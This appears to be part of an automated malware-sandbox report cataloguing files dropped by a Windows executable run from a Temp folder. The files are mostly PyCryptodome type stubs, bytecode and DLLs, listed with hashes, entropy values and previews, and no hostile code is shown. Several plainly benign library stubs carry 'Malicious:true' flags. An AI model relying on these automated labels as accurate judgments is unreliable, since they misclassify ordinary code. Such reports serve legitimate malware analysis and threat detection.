                                                                                                                                            SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                            SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):854
                                                                                                                                            Entropy (8bit):4.891350639959851
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1129
                                                                                                                                            Entropy (8bit):4.991889645425908
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Cryptodome.PublicKey.DSA import DsaKey..from Cryptodome.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[s
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):899
                                                                                                                                            Entropy (8bit):5.021132080157918
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):471
                                                                                                                                            Entropy (8bit):4.916512539941739
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):751
                                                                                                                                            Entropy (8bit):4.99017908117981
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Cryptodome.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):585
                                                                                                                                            Entropy (8bit):5.066781948828717
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1075
                                                                                                                                            Entropy (8bit):5.102280133535786
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKe
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2343
                                                                                                                                            Entropy (8bit):5.282791721396154
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d...Z.d.S.)...........Fc..........................|.d.z...d.k.....r.t...........d.................|.....................................}.|.|.k.....r.t...........d.|.|.f.z...................|.d.z...|.|.|.|.d...S.).a....Create a stateful counter block function suitable for CTR encryption modes... Each call to the function returns the next counter block.. Each counter block is made up by three parts:.. +------+--------------+-------+. |prefix| counter value|postfix|. +------+--------------+-------+.. The counter value is incremented by 1 at each call... Args:. nbits (integer):. Length of the desired counter value, in bits. It must be a multiple of 8.. prefix (byte string):. The constant prefix of the counter block. By default, no prefix is. used.. suffix (byte string):. The constant postfix of the counter block. By default, no suffix is. used.. initial_value (integer
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):295
                                                                                                                                            Entropy (8bit):4.705947008789207
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):243
                                                                                                                                            Entropy (8bit):4.823438083026704
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):166
                                                                                                                                            Entropy (8bit):4.7074966574817525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                            MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                            SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                            SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                            SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1201
                                                                                                                                            Entropy (8bit):4.97562846911311
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:INmlM4W2gRriTHvIqoFaTuYjVrGivBl02WRbgg:AmlzWb+LLYa5prGGBW2Weg
                                                                                                                                            MD5:10D93FB00D0B450C5FFA3C71E98F089A
                                                                                                                                            SHA1:02BB2C952DD2DA82E73161802E8CF8F18AA772A5
                                                                                                                                            SHA-256:47A2329E9C6912D451E2EFB32BD0401041522580880B1CC57A696475F48F3EF7
                                                                                                                                            SHA-512:458CA2C81941BA2840A3606AC47E2D22A635B71F980E9A2C232347685CF32B8865E7908CE6400381F9AF5083D84C8BA92B03195E6D4C015B85497CC51C4E7EEE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.g.d...Z.d.S.).as...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Cryptodome.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Cryptodome.Util.number` Number-theoretic functions (primality testing, etc.).`Cryptodome.Util.Counter` Fast counter functions for CTR cipher modes..`Cryptodome.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Cryptodome.Util.asn1` Minimal support for ASN.1 DER encoding.`Cryptodome.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.)...RFC1751..number..strxor..asn1..Counter..Paddin
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):960
                                                                                                                                            Entropy (8bit):4.800630422402373
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:EJ/hnLH+UXiLiIFkrOS07ZOg/2IphJT8EZFtSlOWVleaPWOW3rLT:EpAiPrOSkYA2WRXb/MPs73
                                                                                                                                            MD5:DDA2412E526524EABAE5EEBA6547949D
                                                                                                                                            SHA1:CE9FA230C205CF5590564EF4472D619D7A338E2E
                                                                                                                                            SHA-256:6F92ABD98D083709148004D0C5490DB456EDEB574201F347A18A1E4715994E0D
                                                                                                                                            SHA-512:CE9456C85E4E7681C7649863CE63817007AE01EECE5C7491F38AB094C69EF5A99F146C30F6419EA3A74370424C8F07F9F2F5454B6BE951412052724D39A4FA8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................6.....d.d.l.m.Z.....e.d.d...............Z.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Cryptodome.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c.....................4.....t...............................................S...N)..._raw_cpuid_lib..have_aes_ni........qC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Util\_cpu_features.pyr....r....)...s...........%..%..'..'..'r....c.....................4.....t...............................................S.r....).r......have_clmulr....r....r....r....r....-...s...........$..$..&..&..&r....N)...Cryptodome.Util._raw_apir....r....r....r....r....r....r......<module>r........s].........>..?..>..>..>..>..>....+..*.+E...,/....0....0......(....(....(....'....'....'....'....'r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.354688723015057
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                            MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                            SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                            SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                            SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.731194408014124
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:lJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGybMZYJWJcX6gbW6s:JVddiT7pgTctEEaEDKDuMCWJcqgbW6
                                                                                                                                            MD5:1547F8CB860AB6EA92B85D4C1B0209A1
                                                                                                                                            SHA1:C5AE217DEE073AC3D23C3BF72EE26D4C7515BD88
                                                                                                                                            SHA-256:1D2F3E627551753E58ED9A85F8D23716F03B51D8FB5394C4108EB1DC90DC9185
                                                                                                                                            SHA-512:40F0B46EE837E4568089D37709EF543A987411A17BDBAE93D8BA9F87804FB34DCA459A797629F34A5B3789B4D89BD46371AC4F00DDFE5D6B521DEA8DC2375115
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1332
                                                                                                                                            Entropy (8bit):5.200498631480205
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:jjobn4Y5J/H0rCHBZ8Sl+AC8EGaOyrPEx2WRObhavkQGovvvE:XoLrE8ZBC4PyT42WgbhOkpovvvE
                                                                                                                                            MD5:F1AB0D76F3EEAB1EDBBD25ADC19BFA13
                                                                                                                                            SHA1:8478C2EBA3C2FF8162A125455EA6005EA8BFB38C
                                                                                                                                            SHA-256:1B1BDB56814D3F0BF2BE8418E5B93D77E246C99B3948F47ED7CD24FCA3BA6D24
                                                                                                                                            SHA-512:4AEAF1A1B063AEC6D9DC5FE4374881D63D7A338EF2556709A175B74E4C34B5C4B5DC17F5F92D82F03EB8A72B9AD68B32DC41C586F5FEF09E409477F56D2064CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.Z.d...Z.d.S.)......Nc.....................d.....|.d...........d.k.....r.t...........d.................t...........|.d.d...........................|.g.z...}.t...........j...............................t...........j...............................t.......................................\...}.}.t...........j...............................|.d...............}.t...........j.........j.........|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Cryptodome"... filename : string. The filename (inclusing extension) in the target directory.. r......Cryptodomez-Only available for modules under 'Cryptodome'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filename..util_lib.._..root_libs.... .pC:\Users\Administrator\AppData\Local\Programs\Python\Python311
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.5743153977203175
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                            MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                            SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                            SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                            SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14334
                                                                                                                                            Entropy (8bit):5.247449811324165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:zZigdoN17fItDTvw/vlEVW5B6UVMmUtmKlTRxKmf9rZTSLI1wEOBPxeDN62i5lPU:NndoN1zsTvedBB6UGmUvzxHTSowESxzo
                                                                                                                                            MD5:803A4358384CEDBD6BF94BC36312E4B1
                                                                                                                                            SHA1:5C7A7739C60E3B7BEDC4E16D6F10832C97573C64
                                                                                                                                            SHA-256:D52357531149E4F67AB2BD59B4D6F00D2139AF2A7AEF4377455D21E14B99868D
                                                                                                                                            SHA-512:9C0284556A6DD3869D4B2E15F4D14F7AEB31257997A60EFA3D6237777147309CD5F0B515F6935DF8D5025CB44C50720CE8C0C030F08E0E225037FA768FCBB2EC
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):933
                                                                                                                                            Entropy (8bit):4.777842095513583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                            MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                            SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                            SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                            SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.686131723746002
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:EiZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DmWMoG4BcX6gbW6O:HVddiT7pgTctEEO3DcoHcqgbW6
                                                                                                                                            MD5:16F42DE194AAEFB2E3CDEE7FA63D2401
                                                                                                                                            SHA1:BE2AB72A90E0342457A9D13BE5B6B1984875EDEA
                                                                                                                                            SHA-256:61E23970B6CED494E11DC9DE9CB889C70B7FF7A5AFE5242BA8B29AA3DA7BC60E
                                                                                                                                            SHA-512:A671EA77BC8CA75AEDB26B73293B51B780E26D6B8046FE1B85AE12BC9CC8F1D2062F74DE79040AD44D259172F99781C7E774FE40768DC0A328BD82A48BF81489
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3885
                                                                                                                                            Entropy (8bit):4.815634844501543
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                            MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                            SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                            SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                            SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67228
                                                                                                                                            Entropy (8bit):5.28813757547964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:89kNqUkWZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXZ:8RwpyUy0lsEgZOtg78sI6VTLQ5DRvvz8
                                                                                                                                            MD5:50DC82BBBF96F3A8A270EFA0B831D765
                                                                                                                                            SHA1:C1D82E78CABBEAB45605A44EC265B84D9AB5B04C
                                                                                                                                            SHA-256:2FF41892F47D91B87291CFEF24517119C5AAC5CA0A8BD201EB6986BD8B22629D
                                                                                                                                            SHA-512:9B79B574988000392126BDC152FE45A7B0BB8E884529D62D145EB6949C1FF7FA365F343391B431835D1BED2ACFF551A59B5957F4FD6BA118CBF6AD9B25D74418
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):994
                                                                                                                                            Entropy (8bit):4.898132103946567
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                            MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                            SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                            SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                            SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8022
                                                                                                                                            Entropy (8bit):4.932859039913864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:godTTOBYDLOjIWTjpSaRBF7mxz7jdDpD6erboFpX8j64rkX202m5PDpAa9DGZ/Ef:goMqUI182NvJ0H4rTO5PFJ5G+TyzWWY
                                                                                                                                            MD5:B656DB916768B23EF5F82F0171DB08B5
                                                                                                                                            SHA1:B8C7022F62C31CF389C2739FFA1A572EB8BDBCEF
                                                                                                                                            SHA-256:6591B7D68A2B60048A4D67DB11C0E629A729319E5DD3D479B3045959D1B5FCA2
                                                                                                                                            SHA-512:4F06FE878FAED8FCB871A0B478645087F1D5912E16D55F5182E5E0DFA4F548F116522E7A4E485BA36E0DE222E8FEA03D862976971A61D60B1007A39D0560FD13
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):870
                                                                                                                                            Entropy (8bit):4.791491758318878
                                                                                                                                            Encrypted:false
